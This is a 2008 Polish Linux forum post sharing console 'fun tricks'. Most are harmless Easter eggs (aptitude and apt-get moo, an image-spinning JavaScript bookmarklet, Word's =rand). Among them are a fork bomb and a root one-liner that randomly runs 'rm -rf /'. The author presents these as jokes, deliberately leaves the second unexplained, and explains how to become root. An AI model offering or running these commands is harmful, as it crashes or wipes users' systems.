Skocz do zawartości


Zdjęcie

"Zabawy" w linuksie


  • Zaloguj się, aby dodać odpowiedź
Brak odpowiedzi do tego tematu

#1 webtrax

webtrax

    Stały użytkownik

  • 180 postów

Napisano 20 02 2008 - 02:45

?Zabawy? w linuksie



Linuks dla wielu jest bardzo trudnym, poważnym systemem, na którym nie można się pobawić. Stwierdzam, że się grubo mylą... Podam parę przykładowych ?sztuczek?, którymi można się pobawić.

Na początek 2 sposoby na zdenerwowanie się. Zastrzegam, że nie odpowiadam za szkody wyrządzone komendami podanymi poniżej.

W konsoli wpisujemy

:()(:|:&);:

spowoduje to zawieszenie naszego komputera. To jeszcze nic złego. Kolejny przykład to komenda wpisywana z konta root'a (inaczej administratora)*.

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo ?Still alive?


Zastanawiam się czy opisać działanie tej komendy, czy poczekać na posty użytkowników, którzy użyli jej na swoich systemach i zaczną mnie wyzywać ;p. Żeby nie psuć zabawy, pozostawię to narazie bez opisu, ale radzę, żeby wykonywać to raczej na wirtualnym systemie niż na prawdziwym.

Teraz przejdę do mniej drastycznych poleceń konsolowych. Najpierw słoń zjadany przez węża. Tak jak poprzednio, otwieramy konsolę i wpisujemy po kolei:

aptitude moo

aptitude -v moo

aptitude -v -v moo

aptitude -v -v -v moo

aptitude -v -v -v -v moo

aptitude -v -v -v -v -v moo

na koniec, jeżeli nadal nie widzicie co przedstawia obrazek to wpiszcie:

aptitude -v -v -v -v -v -v moo


Kolejne zwierzątko to byk/krowa, jak kto woli.

Jako root wpisujemy komendę:

apt-get moo

Czyż nie jest śliczna? :(

* Dla tych, którzy nie wiedzą jeszcze jak zalogować się w linuksie na konto root'a podam małą instrukcję.
Należy uruchomić konsolę (czasem nazwaną terminal).
Następnie wpisujemy komendę

su

Wpisujemy hasło root'a (takie jak podawaliśmy przy instalacji systemu). Nie zdziwcie się jak nie bedzięcie widzieli nawet gwiazdek przy wpisywaniu tego hasła, linuks tak już ma. Jak wpiszecie to już jesteście na koncie root'a (administratora).


Teraz mała ciekawostka dostępna na linuksie jak i na windowsie. Otwieramy przeglądarkę internetową. Odnajdujemy jakąś stronę z dużą ilością zdjęć, np.
Grafika google

wchodzimy na nią, następnie kasujemy cały adres z paska adresowego a w jego miejsce wklejamy poniższy kod:

java script:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position="absolute"; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++} setInterval("A()",5); void(0);

i wciskamy enter. Nie wiem jak dla was, ale dla mnie fajny efekt :(


(nie wiem czy wam również, ale mi w tym kodzie rozdziela słowo javascript na dwie części i do java daje hiperlink, nie wiem jak się tego pozbyć :(
tak więc jak będziecie kopiować ten kod do przeglądarki to pamiętajcie o usunięci spacji na początku pomiędzy java a script a dopiero wtedy potwierdzajcie Enterem.)

Dla tych co nie mają linuksa mam też coś na poczciwe okienka. "Sztuczka" jest już bardzo stara.
Otwórzcie worda i wpiszcie:

=rand(A,B)

*zamiast A i B wpiszcie dowolne liczby, np. =rand(15,34)

następnie naciśnijcie Enter.



Mam nadzieję, że się podobało :(

Pozdrawiam webtrax

  • 0




Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych